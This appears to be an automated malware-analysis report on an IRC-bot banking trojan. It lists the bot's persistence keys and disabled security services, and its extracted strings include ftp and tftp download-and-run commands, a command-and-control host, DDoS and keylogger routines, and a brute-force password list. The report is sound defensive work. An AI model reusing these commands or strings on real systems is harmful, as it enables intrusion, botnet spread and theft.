Trojan.GenericKD.2255314_a40a092a26
HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.2255314 (B) (Emsisoft), Trojan.GenericKD.2255314 (AdAware), BackdoorIRC.YR, GenericIRCBot.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: a40a092a264abbb7b3e4255d28696b91
SHA1: 9865b8e3c3be27da564ffb9b4c0459cf519e7c2a
SHA256: d4786fb38a2129464e1e248a17d3669677ca4d000b2e905671eb764f64ec3e8a
SSDeep: 3072:f0qW0qYDp49oQr/Mf97Cosbgo3RDDn0GuDkq10fYHTvG2w9IyherhZzkgSA:JDO9wfkQOP0G2 gvGfeygzkg
Size: 344064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: NsPackv23, NsPackV2X, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2004-08-04 09:01:37
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Trojan creates the following process(es):
explore.exe:1452
%original file name%.exe:1808
regedit.exe:640
The Trojan injects its code into the following process(es):
explore.exe:464
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process explore.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a.bat (5 bytes)
The process explore.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UP6LBPK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX0R9ZUJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S8PZTGPI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JB2UPCO0\desktop.ini (67 bytes)
%System%\explore.exe (601 bytes)
C:\a.bat (5 bytes)
The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (0 bytes)
Registry activity
The process explore.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Control\Lsa]
"RestrictAnonymous" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\OLE]
"1337 virus" = "explore.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 B3 5A 8F 50 08 9D 06 0A 42 C7 51 FB 33 A6 3B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Ole]
"EnableDCOM" = "N"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"1337 virus" = "explore.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"1337 virus" = "explore.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process explore.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 65 44 72 A2 8F 48 88 7F 6F FD 14 DF 69 17 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 4D EA 84 83 44 F4 EA 0E 51 9A 7D 79 97 01 9D"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"
The process regedit.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C AD 2D 77 76 71 24 9E 3B 93 E5 F9 6B 73 95 F0"
[HKLM\System\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName" = ""
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"
[HKLM\System\CurrentControlSet\Services\SharedAccess]
"Start" = "4"
Dropped PE files
| MD5 | File path |
|---|---|
| 9bcf175d62ffc1746167ce475ae6190f | c:\WINDOWS\system32\explore.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.2180
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| 4096 | 188416 | 188416 | 0.009375 | 07f4b8fac5debeee351dd0f8bd3d61d3 | |
| 192512 | 151552 | 151552 | 5.37114 | f04c59b55923ed2fa5857d1aca96a8a6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
explore.exe_464:
GWSSh
t1SSSSh
PSSh<LA
GET / HTTP/1.0
Host: %s
Authorization: Negotiate %s
__MSVCRT_HEAP_SELECT
Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
Error: setsockopt() failed, returned: <%d>.
Error: socket() failed, returned: <%d>.
] (tcp.p
] (keylog.p
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
:.login
:,login
:!login
:@login
:$login
:%login
:^login
:&login
:*login
:-login
: login
:/login
:\login
:=login
:?login
:'login
:`login
:~login
: login
:.auth
:.hashin
:.secure
:.syn
:%syn
CDKey
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
Error: recv() failed, returned: <%d>
Suspicious %s packet from: %s:%d - %s.
Error: WSAIoctl() failed, returned: <%d>.
Error: bind() failed, returned: <%d>.
] (%s.p
trying to root %s
] (tPTF.p
transfer complete to IP: %s
\\%s\pipe\epmapper
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
tftp -i %s get %s
\\%s\ipc$
] (%s.e
cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
Windows uk 2k3 ee sp0 24
Windows uk 2k3 ee sp0 23
Windows uk 2k3 ee sp0 22
Windows uk 2k3 ee sp0 21
Windows uk 2k3 ee sp0 20
Windows uk 2k3 ee sp0 19
Windows uk 2k3 ee sp0 18
Windows uk 2k3 ee sp0 17
Windows uk 2k3 ee sp0 16
Windows uk 2k3 ee sp0 15
Windows uk 2k3 ee sp0 14
Windows uk 2k3 ee sp0 13
Windows uk 2k3 ee sp0 12
Windows uk 2k3 ee sp0 11
Windows uk 2k3 ee sp0 10
Windows uk 2k3 ee sp0 9
Windows uk 2k3 ee sp0 8
Windows uk 2k3 ee sp0 7
Windows uk 2k3 ee sp0 6
Windows uk 2k3 ee sp0 5
Windows uk 2k3 ee sp0 4
Windows uk 2k3 ee sp0 3
Windows uk 2k3 ee sp0 2
Windows uk 2k3 ee sp0 1
Windows uk 2k3 se sp0 24
Windows uk 2k3 se sp0 23
Windows uk 2k3 se sp0 22
Windows uk 2k3 se sp0 21
Windows uk 2k3 se sp0 20
Windows uk 2k3 se sp0 19
Windows uk 2k3 se sp0 18
Windows uk 2k3 se sp0 17
Windows uk 2k3 se sp0 16
Windows uk 2k3 se sp0 15
Windows uk 2k3 se sp0 14
Windows uk 2k3 se sp0 13
Windows uk 2k3 se sp0 12
Windows uk 2k3 se sp0 11
Windows uk 2k3 se sp0 10
Windows uk 2k3 se sp0 9
Windows uk 2k3 se sp0 8
Windows uk 2k3 se sp0 7
Windows uk 2k3 se sp0 6
Windows uk 2k3 se sp0 5
Windows uk 2k3 se sp0 4
Windows uk 2k3 se sp0 3
Windows uk 2k3 se sp0 2
Windows uk 2k3 se sp0 1
Windows uk xp pro sp1 25
Windows uk xp pro sp1 24
Windows uk xp pro sp1 23
Windows uk xp pro sp1 22
Windows uk xp pro sp1 21
Windows uk xp pro sp1 20
Windows uk xp pro sp1 19
Windows uk xp pro sp1 18
Windows uk xp pro sp1 17
Windows uk xp pro sp1 16
Windows uk xp pro sp1 15
Windows uk xp pro sp1 14
Windows uk xp pro sp1 13
Windows uk xp pro sp1 12
Windows uk xp pro sp1 11
Windows uk xp pro sp1 10
Windows uk xp pro sp1 9
Windows uk xp pro sp1 8
Windows uk xp pro sp1 7
Windows uk xp pro sp1 6
Windows uk xp pro sp1 5
Windows uk xp pro sp1 4
Windows uk xp pro sp1 3
Windows uk xp pro sp1 2
Windows uk xp pro sp1 1
Windows 2000 SP4 GER FAT32
Windows nl sp1 23
Windows nl sp1 22
Windows nl sp1 21
Windows nl sp1 20
Windows nl sp1 19
Windows nl sp1 18
Windows nl sp1 17
Windows nl sp1 16
Windows nl sp1 15
Windows nl sp1 14
Windows nl sp1 13
Windows nl sp1 12
Windows nl sp1 11
Windows nl sp1 10
Windows nl sp1 9
Windows nl sp1 8
Windows nl sp1 7
Windows nl sp1 6
Windows nl sp1 5
Windows nl sp1 4
Windows nl sp1 3
Windows nl sp1 2
Windows nl sp1 1
Windows XP SP0 1 ENG
Windows XP SP0 1 GER NL IT FR
\\%s\pipe\wkssvc
%s, port:%d now executing %s on remote machine.
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 NzmxFtpd
331 Password required
%s %s
220 NzmxFtpd 0wns j0
] (httpd.p
Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Failed to start worker thread, error: <%d>.
Worker thread of server thread: %d.
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
%s%s/
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s %-21s
%2.2d/%2.2d/M %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
transfer to %s
, info: (%s).
File not found: %s (%s).
Failed to open file: %s.
Total: %d in %s.
%s: %d,
] (portscan.p
Current IP: %s.
Failed to start server, error: <%d>.
Server listening on IP: %s:%d, Directory: %s\.
] (PTF.p
Server started on Port: %d, File: %s, Request: %s.
%d.%d.%d.%d
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
Finished at %s:%d after %d minute(s) of scanning.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Failed to start connection thread, error: <%d>.
Client connection to IP: %s:%d, Server thread: %d.
Failed to start server on Port %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Server started on: %s:%d.
Error: Failed to connect to target, returned: <%d>.
Error: Failed to open socket(), returned: <%d>.
Authentication failed. Remote userid: %s != %s.
Key3=
Key2=
Key1=
nwncdkey.ini
base\mp\sof2key
Chrome
Software\Techland\Chrome
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Global Operations
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Microsoft Windows Product ID
Software\Microsoft\Windows\CurrentVersion
prvkey
CDKey
%s\%s
%s CD Key: (%s).
Files found: %d.
Searching for file: %s.
Found: %s\%s
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
c:\a.bat
Echo REGEDIT4>%temp%\1.reg
Echo.>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg
Echo "TransportBindName"="">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg
Echo "Start"=dword:00000004>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg
Echo "EnableDCOM"="N">>%temp%\1.reg
Echo "EnableRemoteConnect"="N">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg
Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg
Echo "Enabled"=hex:00>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg
Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg
Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg
Echo "NameServer"="">>%temp%\1.reg
Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg
Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg
Echo "Domain"="">>%temp%\1.reg
Echo "SearchList"="">>%temp%\1.reg
Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg
Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg
Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg
Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg
Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg
Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg
Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg
Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg
Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg
Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg
Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg
Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg
Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg
Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg
Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg
Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg
Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg
Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg
Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg
Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg
Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg
Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg
Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg
Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg
Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg
Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg
Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg
Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg
Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg
Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg
Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg
Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg
Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg
Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg
Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg
Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg
Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg
Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg
Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg
Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\1.reg
Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\1.reg
Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg
Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg
Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg
Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg
Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg
Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg
Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg
Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg
Echo "SackOpts"=dword:00000001>>%temp%\1.reg
Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg
Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg
Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg
Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg
Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg
Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg
Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg
Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg
Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg
Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg
Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg
Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg
Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg
Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg
START /WAIT REGEDIT /S %temp%\1.reg
DEL %temp%\1.reg
Not supported by this system.
Error getting ARP cache: <%d>.
Finished sending pings to %s.
Error sending pings to %s.
] (udp.p
Finished sending packets to %s.
PRIVMSG %s :%s
] (cmd.p
Failed to start IO thread, error: <%d>.
cmd.exe
Ý %dh %dm
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
%s (%s)
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
Failed to connect to HTTP server.
Invalid URL.
Failed to get requested URL from HTTP server.
URL visited.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
Transfer complete to IP: %s, Filename: %s (%s bytes).
DCC SEND %s %i %i %i
Transfer complete from IP: %s, Filename: %s (%s bytes).
Bad URL, or DNS Error: %s.
Update failed: Error executing file: %s.
Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
Opened: %s.
Downloaded %.1f KB to %s @ %.1f KB/sec.
CRC Failed (%d != %d).
Filesize is incorrect: (%d != %d).
Update: %s (%dKB transferred).
File download: %s (%dKB transferred).
Couldn't open file: %s.
%s Drive (%s): %s total, %s free, %s available.
%s Drive (%s): Failed to stat, device not ready.
%s %s :%s
PRIVMSG
%s: No service specified.
Error with service: '%s'. %s
%s service: '%s'.
%s: %s (%s)
The following Windows services are registered:
%s: No share specified.
%s share: '%s'.
%s: Error with share: '%s'. %s
Share list error: %s <%ld>
%s: No username specified.
%s: Error with username: '%s'. %s
%s username: '%s'.
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
User list error: %s <%ld>
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
%s <Server: %S> <Message: %S>
irc.kr3wzb4se.info
explore.exe
keys.txt
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
supported
windows95
windows98
windowsME
windows2k
WindowsXP
00000000
windows
webpage
supporte
support
smtp
report
passphra
operator
mickey
loginwor
keyword
keyin
keybord
asshole
mypass123
mypass
login
ihavenopass
passwd
88888888
11111111
123456789
12345678
1234567
PASSWORD
roffer v1.2b24 [20031215140650], hXXp://iroffer.org/
*@fbi.gov
Failed to start registry thread, error: <%d>.
Failed to start secure thread, error: <%d>.
Failed to start AV/FW killer thread, error: <%d>.
%s %d "%s"
Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
%s system.
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
Uploading file: %s to: %s failed.
Uploading file: %s to: %s
PTF.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
File not found: %s.
web.PTF.ul
web.hcon
15 Message sent to %s.
helo $rndnick
mail from: <%s>
